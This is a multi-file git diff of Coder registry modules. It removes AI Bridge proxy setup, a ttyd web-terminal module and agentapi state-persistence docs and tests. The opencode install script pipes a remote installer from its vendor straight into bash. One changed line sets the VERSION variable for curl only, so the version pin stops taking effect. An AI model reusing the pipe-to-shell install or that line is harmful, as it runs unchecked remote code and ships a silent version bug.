-    condition     = !var.enable_aibridge_proxy || (var.aibridge_proxy_cert_path != null && length(var.aibridge_proxy_cert_path) > 0)
-    error_message = "aibridge_proxy_cert_path is required when enable_aibridge_proxy is true."
-  }
-}
-
-variable "aibridge_proxy_auth_url" {
-  type        = string
-  description = "AI Bridge Proxy URL with authentication. Use the proxy_auth_url output from the aibridge-proxy module."
-  default     = null
-  sensitive   = true
-}
-
-variable "aibridge_proxy_cert_path" {
-  type        = string
-  description = "Path to the AI Bridge Proxy CA certificate. Use the cert_path output from the aibridge-proxy module."
-  default     = null
-}
-
 data "coder_workspace" "me" {}
 data "coder_workspace_owner" "me" {}

@@ -308,9 +279,6 @@ module "agentapi" {
    ARG_TRUSTED_DIRECTORIES='${join(",", var.trusted_directories)}' \
    ARG_EXTERNAL_AUTH_ID='${var.external_auth_id}' \
    ARG_RESUME_SESSION='${var.resume_session}' \
-    ARG_ENABLE_AIBRIDGE_PROXY='${var.enable_aibridge_proxy}' \
-    ARG_AIBRIDGE_PROXY_AUTH_URL='${var.aibridge_proxy_auth_url != null ? var.aibridge_proxy_auth_url : ""}' \
-    ARG_AIBRIDGE_PROXY_CERT_PATH='${var.aibridge_proxy_cert_path != null ? var.aibridge_proxy_cert_path : ""}' \
    /tmp/start.sh
  EOT

@@ -22,9 +22,6 @@ ARG_DENY_TOOLS=${ARG_DENY_TOOLS:-}
 ARG_TRUSTED_DIRECTORIES=${ARG_TRUSTED_DIRECTORIES:-}
 ARG_EXTERNAL_AUTH_ID=${ARG_EXTERNAL_AUTH_ID:-github}
 ARG_RESUME_SESSION=${ARG_RESUME_SESSION:-true}
-ARG_ENABLE_AIBRIDGE_PROXY=${ARG_ENABLE_AIBRIDGE_PROXY:-false}
-ARG_AIBRIDGE_PROXY_AUTH_URL=${ARG_AIBRIDGE_PROXY_AUTH_URL:-}
-ARG_AIBRIDGE_PROXY_CERT_PATH=${ARG_AIBRIDGE_PROXY_CERT_PATH:-}

 validate_copilot_installation() {
  if ! command_exists copilot; then
@@ -121,48 +118,6 @@ setup_github_authentication() {
  return 0
 }

-setup_aibridge_proxy() {
-  if [ "$ARG_ENABLE_AIBRIDGE_PROXY" != "true" ]; then
-    return 0
-  fi
-
-  echo "Setting up AI Bridge Proxy..."
-
-  # Wait for the aibridge-proxy module to finish.
-  # Uses startup coordination to block until aibridge-proxy-setup signals completion.
-  if command -v coder > /dev/null 2>&1; then
-    coder exp sync want "copilot-aibridge" "aibridge-proxy-setup" > /dev/null 2>&1 || true
-    coder exp sync start "copilot-aibridge" > /dev/null 2>&1 || true
-    trap 'coder exp sync complete "copilot-aibridge" > /dev/null 2>&1 || true' EXIT
-  fi
-
-  if [ -z "$ARG_AIBRIDGE_PROXY_AUTH_URL" ]; then
-    echo "ERROR: AI Bridge Proxy is enabled but no proxy auth URL provided."
-    exit 1
-  fi
-
-  if [ -z "$ARG_AIBRIDGE_PROXY_CERT_PATH" ]; then
-    echo "ERROR: AI Bridge Proxy is enabled but no certificate path provided."
-    exit 1
-  fi
-
-  if [ ! -f "$ARG_AIBRIDGE_PROXY_CERT_PATH" ]; then
-    echo "ERROR: AI Bridge Proxy certificate not found at $ARG_AIBRIDGE_PROXY_CERT_PATH."
-    echo "  Ensure the aibridge-proxy module has successfully completed setup."
-    exit 1
-  fi
-
-  # Set proxy environment variables scoped to this process tree only.
-  # These are inherited by the agentapi/copilot process below,
-  # but do not affect other workspace processes, avoiding routing
-  # unnecessary traffic through the proxy.
-  export HTTPS_PROXY="$ARG_AIBRIDGE_PROXY_AUTH_URL"
-  export NODE_EXTRA_CA_CERTS="$ARG_AIBRIDGE_PROXY_CERT_PATH"
-
-  echo "✓ AI Bridge Proxy configured"
-  echo "  CA certificate: $ARG_AIBRIDGE_PROXY_CERT_PATH"
-}
-
 start_agentapi() {
  echo "Starting in directory: $ARG_WORKDIR"
  cd "$ARG_WORKDIR"
@@ -202,6 +157,5 @@ start_agentapi() {
 }

 setup_github_authentication
-setup_aibridge_proxy
 validate_copilot_installation
 start_agentapi
@@ -10,6 +10,8 @@ tags: [nextflow, workflow, hpc, bioinformatics]

 A module that adds Nextflow to your Coder template.

+![Nextflow](../../.images/nextflow.png)
+
 ```tf
 module "nextflow" {
  count    = data.coder_workspace.me.start_count
@@ -13,7 +13,7 @@ Run [OpenCode](https://opencode.ai) AI coding assistant in your workspace for in
 ```tf
 module "opencode" {
  source   = "registry.coder.com/coder-labs/opencode/coder"
-  version  = "0.1.2"
+  version  = "0.1.1"
  agent_id = coder_agent.main.id
  workdir  = "/home/coder/project"
 }
@@ -34,7 +34,7 @@ resource "coder_ai_task" "task" {

 module "opencode" {
  source   = "registry.coder.com/coder-labs/opencode/coder"
-  version  = "0.1.2"
+  version  = "0.1.1"
  agent_id = coder_agent.main.id
  workdir  = "/home/coder/project"

@@ -89,7 +89,7 @@ Run OpenCode as a command-line tool without web interface or task reporting:
 ```tf
 module "opencode" {
  source       = "registry.coder.com/coder-labs/opencode/coder"
-  version      = "0.1.2"
+  version      = "0.1.1"
  agent_id     = coder_agent.main.id
  workdir      = "/home/coder"
  report_tasks = false
@@ -39,7 +39,7 @@ install_opencode() {
      if [ "$ARG_OPENCODE_VERSION" = "latest" ]; then
        curl -fsSL https://opencode.ai/install | bash
      else
-        curl -fsSL https://opencode.ai/install | VERSION="${ARG_OPENCODE_VERSION}" bash
+        VERSION=$ARG_OPENCODE_VERSION curl -fsSL https://opencode.ai/install | bash
      fi
      export PATH=/home/coder/.opencode/bin:$PATH
      printf "Opencode location: %s\n" "$(which opencode)"
@@ -1,57 +0,0 @@
---
-display_name: ttyd
-description: Share a terminal command over the web via a Coder app
-icon: ../../../../.icons/terminal.svg
-verified: true
-tags: [terminal, web, ttyd]
---
-
-# ttyd
-
-Run any command and expose it as a web-based terminal via [ttyd](https://github.com/tsl0922/ttyd). Each connection spawns a new process for the configured command. The terminal is accessible as a Coder app in the workspace UI.
-
-```tf
-module "ttyd" {
-  count    = data.coder_workspace.me.start_count
-  source   = "registry.coder.com/coder-labs/ttyd/coder"
-  version  = "1.0.0"
-  agent_id = coder_agent.main.id
-  command  = "bash"
-}
-```
-
-## Examples
-
-### Custom command
-
-```tf
-module "ttyd" {
-  count        = data.coder_workspace.me.start_count
-  source       = "registry.coder.com/coder-labs/ttyd/coder"
-  version      = "1.0.0"
-  agent_id     = coder_agent.main.id
-  display_name = "Shared Terminal"
-  command      = "tmux new-session -A -s main"
-  share        = "authenticated"
-}
-```
-
-### Readonly with custom ttyd options
-
-```tf
-module "ttyd" {
-  count           = data.coder_workspace.me.start_count
-  source          = "registry.coder.com/coder-labs/ttyd/coder"
-  version         = "1.0.0"
-  agent_id        = coder_agent.main.id
-  command         = "tail -f /var/log/app.log"
-  writable        = false
-  additional_args = "-t fontSize=18"
-}
-```
-
-## Session Behavior
-
-By default, each browser tab that opens the ttyd app spawns a **new process** for the configured command. Closing the tab kills that process.
-
-To get a **persistent, shared session** that survives tab closes and allows multiple viewers, use tmux as the command (see example above). This requires tmux to be installed in the workspace image.
@@ -1,112 +0,0 @@
-import { describe, expect, it } from "bun:test";
-import {
-  executeScriptInContainer,
-  runTerraformApply,
-  runTerraformInit,
-  type scriptOutput,
-  testRequiredVariables,
-} from "~test";
-
-function testBaseLine(output: scriptOutput) {
-  expect(output.exitCode).toBe(0);
-
-  const stdout = output.stdout.join("\n");
-  expect(stdout).toContain("Installing ttyd");
-  expect(stdout).toContain("Installation complete!");
-  expect(stdout).toContain("Starting ttyd in background...");
-}
-
-describe("ttyd", async () => {
-  await runTerraformInit(import.meta.dir);
-
-  testRequiredVariables(import.meta.dir, {
-    agent_id: "foo",
-    command: "bash",
-  });
-
-  it("runs with bash", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      command: "bash",
-    });
-
-    const output = await executeScriptInContainer(
-      state,
-      "alpine/curl",
-      "sh",
-      "apk add bash",
-    );
-
-    testBaseLine(output);
-  }, 30000);
-
-  it("runs with custom command", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      command: "htop",
-    });
-
-    const output = await executeScriptInContainer(
-      state,
-      "alpine/curl",
-      "sh",
-      "apk add bash",
-    );
-
-    testBaseLine(output);
-    expect(output.stdout.join("\n")).toContain("htop");
-  }, 30000);
-
-  it("runs with writable=false", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      command: "bash",
-      writable: "false",
-    });
-
-    const output = await executeScriptInContainer(
-      state,
-      "alpine/curl",
-      "sh",
-      "apk add bash",
-    );
-
-    testBaseLine(output);
-  }, 30000);
-
-  it("runs with subdomain=false", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      command: "bash",
-      agent_name: "main",
-      subdomain: "false",
-    });
-
-    const output = await executeScriptInContainer(
-      state,
-      "alpine/curl",
-      "sh",
-      "apk add bash",
-    );
-
-    testBaseLine(output);
-  }, 30000);
-
-  it("runs with additional_args", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      command: "bash",
-      additional_args: "-t fontSize=18",
-    });
-
-    const output = await executeScriptInContainer(
-      state,
-      "alpine/curl",
-      "sh",
-      "apk add bash",
-    );
-
-    testBaseLine(output);
-    expect(output.stdout.join("\n")).toContain("fontSize=18");
-  }, 30000);
-});
@@ -1,165 +0,0 @@
-terraform {
-  required_version = ">= 1.0"
-
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 2.5"
-    }
-  }
-}
-
-variable "agent_id" {
-  type        = string
-  description = "The ID of a Coder agent."
-}
-
-data "coder_workspace" "me" {}
-
-data "coder_workspace_owner" "me" {}
-
-variable "agent_name" {
-  type        = string
-  description = "The name of the coder_agent resource. (Only required if subdomain is false and the template uses multiple agents.)"
-  default     = null
-}
-
-variable "slug" {
-  type        = string
-  description = "The slug of the coder_app resource."
-  default     = "ttyd"
-}
-
-variable "display_name" {
-  type        = string
-  description = "The display name for the ttyd application."
-  default     = "Web Terminal"
-}
-
-variable "port" {
-  type        = number
-  description = "The port to run ttyd on."
-  default     = 7681
-}
-
-variable "command" {
-  type        = string
-  description = "The command for ttyd to run (e.g., bash, fish, htop)."
-}
-
-variable "writable" {
-  type        = bool
-  description = "Allow clients to write to the terminal."
-  default     = true
-}
-
-variable "max_clients" {
-  type        = number
-  description = "Maximum number of concurrent clients (0 for unlimited)."
-  default     = 0
-}
-
-variable "additional_args" {
-  type        = string
-  description = "Additional arguments to pass to ttyd."
-  default     = ""
-}
-
-variable "log_path" {
-  type        = string
-  description = "The path to log ttyd output to. Defaults to ~/.local/state/ttyd/ttyd.log (XDG-compliant)."
-  default     = ""
-}
-
-variable "ttyd_version" {
-  type        = string
-  description = "The version of ttyd to install."
-  default     = "1.7.7"
-}
-
-variable "share" {
-  type        = string
-  description = "Who can access the app: 'owner' (workspace owner only), 'authenticated' (logged-in users), or 'public' (anyone)."
-  default     = "owner"
-  validation {
-    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
-    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
-  }
-}
-
-variable "subdomain" {
-  type        = bool
-  description = <<-EOT
-    Determines whether the app will be accessed via its own subdomain or whether it will be accessed via a path on Coder.
-    If wildcards have not been setup by the administrator then apps with "subdomain" set to true will not be accessible.
-  EOT
-  default     = true
-}
-
-variable "order" {
-  type        = number
-  description = "The order determines the position of app in the UI presentation. The lowest order is shown first and apps with equal order are sorted by name (ascending order)."
-  default     = null
-}
-
-variable "group" {
-  type        = string
-  description = "The name of a group that this app belongs to."
-  default     = null
-}
-
-variable "open_in" {
-  type        = string
-  description = <<-EOT
-    Determines where the app will be opened. Valid values are "tab" and "slim-window" (default).
-    "tab" opens in a new tab in the same browser window.
-    "slim-window" opens a new browser window without navigation controls.
-  EOT
-  default     = "slim-window"
-  validation {
-    condition     = contains(["tab", "slim-window"], var.open_in)
-    error_message = "The 'open_in' variable must be one of: 'tab', 'slim-window'."
-  }
-}
-
-resource "coder_script" "ttyd" {
-  agent_id     = var.agent_id
-  display_name = var.display_name
-  icon         = "/icon/terminal.svg"
-  script = templatefile("${path.module}/run.sh", {
-    PORT            = var.port,
-    COMMAND         = var.command,
-    WRITABLE        = var.writable,
-    MAX_CLIENTS     = var.max_clients,
-    ADDITIONAL_ARGS = var.additional_args,
-    LOG_PATH        = local.log_path,
-    VERSION         = var.ttyd_version,
-    BASE_PATH       = local.base_path,
-  })
-  run_on_start = true
-}
-
-resource "coder_app" "ttyd" {
-  count        = var.command != "" ? 1 : 0
-  agent_id     = var.agent_id
-  slug         = var.slug
-  display_name = var.display_name
-  url          = "http://localhost:${var.port}${local.base_path}/"
-  icon         = "/icon/terminal.svg"
-  subdomain    = var.subdomain
-  share        = var.share
-  order        = var.order
-  group        = var.group
-  open_in      = var.open_in
-
-  healthcheck {
-    url       = "http://localhost:${var.port}${local.base_path}/token"
-    interval  = 5
-    threshold = 6
-  }
-}
-
-locals {
-  base_path = var.subdomain ? "" : format("/@%s/%s%s/apps/%s", data.coder_workspace_owner.me.name, data.coder_workspace.me.name, var.agent_name != null ? ".${var.agent_name}" : "", var.slug)
-  log_path  = var.log_path != "" ? var.log_path : "~/.local/state/ttyd/ttyd.log"
-}
@@ -1,87 +0,0 @@
-#!/usr/bin/env bash
-
-set -euo pipefail
-
-BOLD='\033[[0;1m'
-
-if command -v ttyd &> /dev/null; then
-  printf "%sFound existing ttyd installation\n\n" "$${BOLD}"
-else
-  printf "%sInstalling ttyd %s\n\n" "$${BOLD}" "${VERSION}"
-
-  ARCH=$(uname -m)
-  # shellcheck disable=SC2195
-  case "$${ARCH}" in
-    x86_64) BINARY="ttyd.x86_64" ;;
-    aarch64) BINARY="ttyd.aarch64" ;;
-    armv7l) BINARY="ttyd.armhf" ;;
-    armv6l) BINARY="ttyd.arm" ;;
-    *)
-      echo "ERROR: Unsupported architecture: $${ARCH}" >&2
-      exit 1
-      ;;
-  esac
-
-  BIN_DIR="$${HOME}/.local/bin"
-  mkdir -p "$${BIN_DIR}"
-  export PATH="$${BIN_DIR}:$${PATH}"
-
-  TTYD_BIN="$${BIN_DIR}/ttyd"
-  LOCK_DIR="/tmp/ttyd-install.lock"
-
-  if [[ ! -f "$${TTYD_BIN}" ]]; then
-    if mkdir "$${LOCK_DIR}" 2> /dev/null; then
-      if [[ ! -f "$${TTYD_BIN}" ]]; then
-        DOWNLOAD_URL="https://github.com/tsl0922/ttyd/releases/download/${VERSION}/$${BINARY}"
-        printf "Downloading ttyd from %s\n" "$${DOWNLOAD_URL}"
-        curl -fsSL "$${DOWNLOAD_URL}" -o "$${TTYD_BIN}.tmp"
-        chmod +x "$${TTYD_BIN}.tmp"
-        mv "$${TTYD_BIN}.tmp" "$${TTYD_BIN}"
-      fi
-      rmdir "$${LOCK_DIR}" 2> /dev/null || true
-    else
-      printf "Waiting for ttyd installation to complete...\n"
-      while [[ -d "$${LOCK_DIR}" ]] && [[ ! -f "$${TTYD_BIN}" ]]; do
-        sleep 0.5
-      done
-    fi
-  fi
-
-  printf "Installation complete!\n\n"
-fi
-
-if [[ -z "${COMMAND}" ]]; then
-  printf "No command specified, skipping ttyd startup.\n"
-  exit 0
-fi
-
-ARGS="-p ${PORT}"
-
-if [[ "${WRITABLE}" = "true" ]]; then
-  ARGS="$${ARGS} -W"
-fi
-
-if [[ "${MAX_CLIENTS}" -gt 0 ]] 2> /dev/null; then
-  ARGS="$${ARGS} -m ${MAX_CLIENTS}"
-fi
-
-if [[ -n "${BASE_PATH}" ]]; then
-  ARGS="$${ARGS} -b ${BASE_PATH}"
-fi
-
-if [[ -n "${ADDITIONAL_ARGS}" ]]; then
-  ARGS="$${ARGS} ${ADDITIONAL_ARGS}"
-fi
-
-TTYD_LOG_PATH="${LOG_PATH}"
-TTYD_LOG_PATH="$${TTYD_LOG_PATH/#\~/$${HOME}}"
-TTYD_LOG_DIR="$${TTYD_LOG_PATH%/*}"
-mkdir -p "$${TTYD_LOG_DIR}"
-
-printf "Starting ttyd in background...\n"
-printf "Running: ttyd %s -- %s\n\n" "$${ARGS}" "${COMMAND}"
-
-# shellcheck disable=SC2086
-ttyd $${ARGS} -- ${COMMAND} >> "$${TTYD_LOG_PATH}" 2>&1 &
-
-printf "Logs at %s\n" "$${TTYD_LOG_PATH}"
@@ -16,7 +16,7 @@ The AgentAPI module is a building block for modules that need to run an AgentAPI
 ```tf
 module "agentapi" {
  source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.4.0"
+  version = "2.0.0"

  agent_id             = var.agent_id
  web_app_slug         = local.app_slug
@@ -49,86 +49,6 @@ module "agentapi" {
 }
 ```

-## Task log snapshot
-
-Captures the last 10 messages from AgentAPI when a task workspace stops. This allows viewing conversation history while the task is paused.
-
-To enable for task workspaces:
-
-```tf
-module "agentapi" {
-  # ... other config
-  task_log_snapshot = true # default: true
-}
-```
-
-## State Persistence
-
-AgentAPI can save and restore conversation state across workspace restarts.
-This is disabled by default and requires agentapi binary >= v0.12.0.
-
-State and PID files are stored in `$HOME/<module_dir_name>/` alongside other module files (e.g. `$HOME/.claude-module/agentapi-state.json`).
-
-To enable:
-
-```tf
-module "agentapi" {
-  # ... other config
-  enable_state_persistence = true
-}
-```
-
-To override file paths:
-
-```tf
-module "agentapi" {
-  # ... other config
-  state_file_path = "/custom/path/state.json"
-  pid_file_path   = "/custom/path/agentapi.pid"
-}
-```
-
-## Boundary (Network Filtering)
-
-The agentapi module supports optional [Agent Boundaries](https://coder.com/docs/ai-coder/agent-boundaries)
-for network filtering. When enabled, the module sets up a `AGENTAPI_BOUNDARY_PREFIX` environment
-variable that points to a wrapper script. Agent modules should use this prefix in their
-start scripts to run the agent process through boundary.
-
-Boundary requires a `config.yaml` file with your allowlist, jail type, proxy port, and log
-level. See the [Agent Boundaries documentation](https://coder.com/docs/ai-coder/agent-boundaries)
-for configuration details.
-To enable:
-
-```tf
-module "agentapi" {
-  # ... other config
-  enable_boundary      = true
-  boundary_config_path = "/home/coder/.config/coder_boundary/config.yaml"
-
-  # Optional: install boundary binary instead of using coder subcommand
-  # use_boundary_directly        = true
-  # boundary_version              = "0.6.0"
-  # compile_boundary_from_source  = false
-}
-```
-
-### Contract for agent modules
-
-When `enable_boundary = true`, the agentapi module exports `AGENTAPI_BOUNDARY_PREFIX`
-as an environment variable pointing to a wrapper script. Agent module start scripts
-should check for this variable and use it to prefix the agent command:
-
-```bash
-if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
-  agentapi server -- "${AGENTAPI_BOUNDARY_PREFIX}" my-agent "${ARGS[@]}" &
-else
-  agentapi server -- my-agent "${ARGS[@]}" &
-fi
-```
-
-This ensures only the agent process is sandboxed while agentapi itself runs unrestricted.
-
 ## For module developers

 For a complete example of how to use this module, see the [Goose module](https://github.com/coder/registry/blob/main/registry/coder/modules/goose/main.tf).
@@ -1,108 +0,0 @@
-mock_provider "coder" {}
-
-variables {
-  agent_id             = "test-agent"
-  web_app_icon         = "/icon/test.svg"
-  web_app_display_name = "Test"
-  web_app_slug         = "test"
-  cli_app_display_name = "Test CLI"
-  cli_app_slug         = "test-cli"
-  start_script         = "echo test"
-  module_dir_name      = ".test-module"
-}
-
-run "default_values" {
-  command = plan
-
-  assert {
-    condition     = var.enable_state_persistence == false
-    error_message = "enable_state_persistence should default to false"
-  }
-
-  assert {
-    condition     = var.state_file_path == ""
-    error_message = "state_file_path should default to empty string"
-  }
-
-  assert {
-    condition     = var.pid_file_path == ""
-    error_message = "pid_file_path should default to empty string"
-  }
-
-  # Verify start script contains state persistence ARG_ vars.
-  assert {
-    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE", coder_script.agentapi.script))
-    error_message = "start script should contain ARG_ENABLE_STATE_PERSISTENCE"
-  }
-
-  assert {
-    condition     = can(regex("ARG_STATE_FILE_PATH", coder_script.agentapi.script))
-    error_message = "start script should contain ARG_STATE_FILE_PATH"
-  }
-
-  assert {
-    condition     = can(regex("ARG_PID_FILE_PATH", coder_script.agentapi.script))
-    error_message = "start script should contain ARG_PID_FILE_PATH"
-  }
-
-  # Verify shutdown script contains PID-related ARG_ vars.
-  assert {
-    condition     = can(regex("ARG_PID_FILE_PATH", coder_script.agentapi_shutdown.script))
-    error_message = "shutdown script should contain ARG_PID_FILE_PATH"
-  }
-
-  assert {
-    condition     = can(regex("ARG_MODULE_DIR_NAME", coder_script.agentapi_shutdown.script))
-    error_message = "shutdown script should contain ARG_MODULE_DIR_NAME"
-  }
-
-  assert {
-    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE", coder_script.agentapi_shutdown.script))
-    error_message = "shutdown script should contain ARG_ENABLE_STATE_PERSISTENCE"
-  }
-}
-
-run "state_persistence_disabled" {
-  command = plan
-
-  variables {
-    enable_state_persistence = false
-  }
-
-  assert {
-    condition     = var.enable_state_persistence == false
-    error_message = "enable_state_persistence should be false"
-  }
-
-  # Even when disabled, the ARG_ vars should still be in the script
-  # (the shell script handles the conditional logic).
-  assert {
-    condition     = can(regex("ARG_ENABLE_STATE_PERSISTENCE='false'", coder_script.agentapi.script))
-    error_message = "start script should contain ARG_ENABLE_STATE_PERSISTENCE='false'"
-  }
-}
-
-run "custom_paths" {
-  command = plan
-
-  variables {
-    state_file_path = "/custom/state.json"
-    pid_file_path   = "/custom/agentapi.pid"
-  }
-
-  assert {
-    condition     = can(regex("/custom/state.json", coder_script.agentapi.script))
-    error_message = "start script should contain custom state_file_path"
-  }
-
-  assert {
-    condition     = can(regex("/custom/agentapi.pid", coder_script.agentapi.script))
-    error_message = "start script should contain custom pid_file_path"
-  }
-
-  # Verify custom paths also appear in shutdown script.
-  assert {
-    condition     = can(regex("/custom/agentapi.pid", coder_script.agentapi_shutdown.script))
-    error_message = "shutdown script should contain custom pid_file_path"
-  }
-}
@@ -257,465 +257,4 @@ describe("agentapi", async () => {
    );
    expect(agentApiStartLog).toContain("AGENTAPI_ALLOWED_HOSTS: *");
  });
-
-  test("state-persistence-disabled", async () => {
-    const { id } = await setup({
-      moduleVariables: {
-        enable_state_persistence: "false",
-      },
-    });
-    await execModuleScript(id);
-    await expectAgentAPIStarted(id);
-    const mockLog = await readFileContainer(
-      id,
-      "/home/coder/agentapi-mock.log",
-    );
-    // PID file should always be exported
-    expect(mockLog).toContain("AGENTAPI_PID_FILE:");
-    // State vars should NOT be present when disabled
-    expect(mockLog).not.toContain("AGENTAPI_STATE_FILE:");
-    expect(mockLog).not.toContain("AGENTAPI_SAVE_STATE:");
-    expect(mockLog).not.toContain("AGENTAPI_LOAD_STATE:");
-  });
-
-  test("state-persistence-custom-paths", async () => {
-    const { id } = await setup({
-      moduleVariables: {
-        enable_state_persistence: "true",
-        state_file_path: "/home/coder/custom/state.json",
-        pid_file_path: "/home/coder/custom/agentapi.pid",
-      },
-    });
-    await execModuleScript(id);
-    await expectAgentAPIStarted(id);
-    const mockLog = await readFileContainer(
-      id,
-      "/home/coder/agentapi-mock.log",
-    );
-    expect(mockLog).toContain(
-      "AGENTAPI_STATE_FILE: /home/coder/custom/state.json",
-    );
-    expect(mockLog).toContain(
-      "AGENTAPI_PID_FILE: /home/coder/custom/agentapi.pid",
-    );
-  });
-
-  test("state-persistence-default-paths", async () => {
-    const { id } = await setup({
-      moduleVariables: {
-        enable_state_persistence: "true",
-      },
-    });
-    await execModuleScript(id);
-    await expectAgentAPIStarted(id);
-    const mockLog = await readFileContainer(
-      id,
-      "/home/coder/agentapi-mock.log",
-    );
-    expect(mockLog).toContain(
-      `AGENTAPI_STATE_FILE: /home/coder/${moduleDirName}/agentapi-state.json`,
-    );
-    expect(mockLog).toContain(
-      `AGENTAPI_PID_FILE: /home/coder/${moduleDirName}/agentapi.pid`,
-    );
-    expect(mockLog).toContain("AGENTAPI_SAVE_STATE: true");
-    expect(mockLog).toContain("AGENTAPI_LOAD_STATE: true");
-  });
-
-  describe("shutdown script", async () => {
-    const setupMocks = async (
-      containerId: string,
-      agentapiPreset: string,
-      httpCode: number = 204,
-      pidFilePath: string = "",
-    ) => {
-      const agentapiMock = await loadTestFile(
-        import.meta.dir,
-        "agentapi-mock-shutdown.js",
-      );
-      const coderMock = await loadTestFile(
-        import.meta.dir,
-        "coder-instance-mock.js",
-      );
-
-      await writeExecutable({
-        containerId,
-        filePath: "/usr/local/bin/mock-agentapi",
-        content: agentapiMock,
-      });
-
-      await writeExecutable({
-        containerId,
-        filePath: "/usr/local/bin/mock-coder",
-        content: coderMock,
-      });
-
-      const pidFileEnv = pidFilePath ? `AGENTAPI_PID_FILE=${pidFilePath}` : "";
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `PRESET=${agentapiPreset} ${pidFileEnv} nohup node /usr/local/bin/mock-agentapi 3284 > /tmp/mock-agentapi.log 2>&1 &`,
-      ]);
-
-      await execContainer(containerId, [
-        "bash",
-        "-c",
-        `HTTP_CODE=${httpCode} nohup node /usr/local/bin/mock-coder 18080 > /tmp/mock-coder.log 2>&1 &`,
-      ]);
-
-      await new Promise((resolve) => setTimeout(resolve, 1000));
-    };
-
-    const runShutdownScript = async (
-      containerId: string,
-      taskId: string = "test-task",
-      pidFilePath: string = "",
-      enableStatePersistence: string = "false",
-    ) => {
-      const shutdownScript = await loadTestFile(
-        import.meta.dir,
-        "../scripts/agentapi-shutdown.sh",
-      );
-
-      const libScript = await loadTestFile(
-        import.meta.dir,
-        "../scripts/lib.sh",
-      );
-
-      await writeExecutable({
-        containerId,
-        filePath: "/tmp/agentapi-lib.sh",
-        content: libScript,
-      });
-
-      await writeExecutable({
-        containerId,
-        filePath: "/tmp/shutdown.sh",
-        content: shutdownScript,
-      });
-
-      return await execContainer(containerId, [
-        "bash",
-        "-c",
-        `ARG_TASK_ID=${taskId} ARG_AGENTAPI_PORT=3284 ARG_PID_FILE_PATH=${pidFilePath} ARG_ENABLE_STATE_PERSISTENCE=${enableStatePersistence} CODER_AGENT_URL=http://localhost:18080 CODER_AGENT_TOKEN=test-token /tmp/shutdown.sh`,
-      ]);
-    };
-
-    test("posts snapshot with normal messages", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-
-      await setupMocks(id, "normal");
-      const result = await runShutdownScript(id);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Retrieved 5 messages for log snapshot");
-      expect(result.stdout).toContain("Log snapshot posted successfully");
-      expect(result.stdout).not.toContain("Log snapshot capture failed");
-
-      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
-      const snapshot = JSON.parse(posted);
-      expect(snapshot.task_id).toBe("test-task");
-      expect(snapshot.payload.messages).toHaveLength(5);
-      expect(snapshot.payload.messages[0].content).toBe("Hello");
-      expect(snapshot.payload.messages[4].content).toBe("Great");
-    });
-
-    test("truncates to last 10 messages", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-
-      await setupMocks(id, "many");
-      const result = await runShutdownScript(id);
-
-      expect(result.exitCode).toBe(0);
-
-      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
-      const snapshot = JSON.parse(posted);
-      expect(snapshot.task_id).toBe("test-task");
-      expect(snapshot.payload.messages).toHaveLength(10);
-      expect(snapshot.payload.messages[0].content).toBe("Message 6");
-      expect(snapshot.payload.messages[9].content).toBe("Message 15");
-    });
-
-    test("truncates huge message content", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-
-      await setupMocks(id, "huge");
-      const result = await runShutdownScript(id);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("truncating final message content");
-
-      const posted = await readFileContainer(id, "/tmp/snapshot-posted.json");
-      const snapshot = JSON.parse(posted);
-      expect(snapshot.task_id).toBe("test-task");
-      expect(snapshot.payload.messages).toHaveLength(1);
-      expect(snapshot.payload.messages[0].content).toContain(
-        "[...content truncated",
-      );
-    });
-
-    test("skips gracefully when TASK_ID is empty", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-
-      const result = await runShutdownScript(id, "");
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("No task ID, skipping log snapshot");
-    });
-
-    test("handles 404 gracefully for older Coder versions", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-
-      await setupMocks(id, "normal", 404);
-      const result = await runShutdownScript(id);
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain(
-        "Log snapshot endpoint not supported by this Coder version",
-      );
-    });
-
-    test("sends SIGUSR1 before shutdown", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-      const pidFile = "/tmp/agentapi-test.pid";
-      await setupMocks(id, "normal", 204, pidFile);
-      const result = await runShutdownScript(id, "test-task", pidFile, "true");
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Sending SIGUSR1 to AgentAPI");
-
-      const sigusr1Log = await readFileContainer(id, "/tmp/sigusr1-received");
-      expect(sigusr1Log).toContain("SIGUSR1 received");
-    });
-
-    test("handles missing PID file gracefully", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
-        skipAgentAPIMock: true,
-      });
-      await setupMocks(id, "normal");
-      // Pass a non-existent PID file path with persistence enabled to
-      // exercise the SIGUSR1 path with a missing PID.
-      const result = await runShutdownScript(
-        id,
-        "test-task",
-        "/tmp/nonexistent.pid",
-        "true",
-      );
-
-      expect(result.exitCode).toBe(0);
-      expect(result.stdout).toContain("Shutdown complete");
-    });
-
-    test("sends SIGTERM even when snapshot fails", async () => {
-      const { id } = await setup({
-        moduleVariables: {},
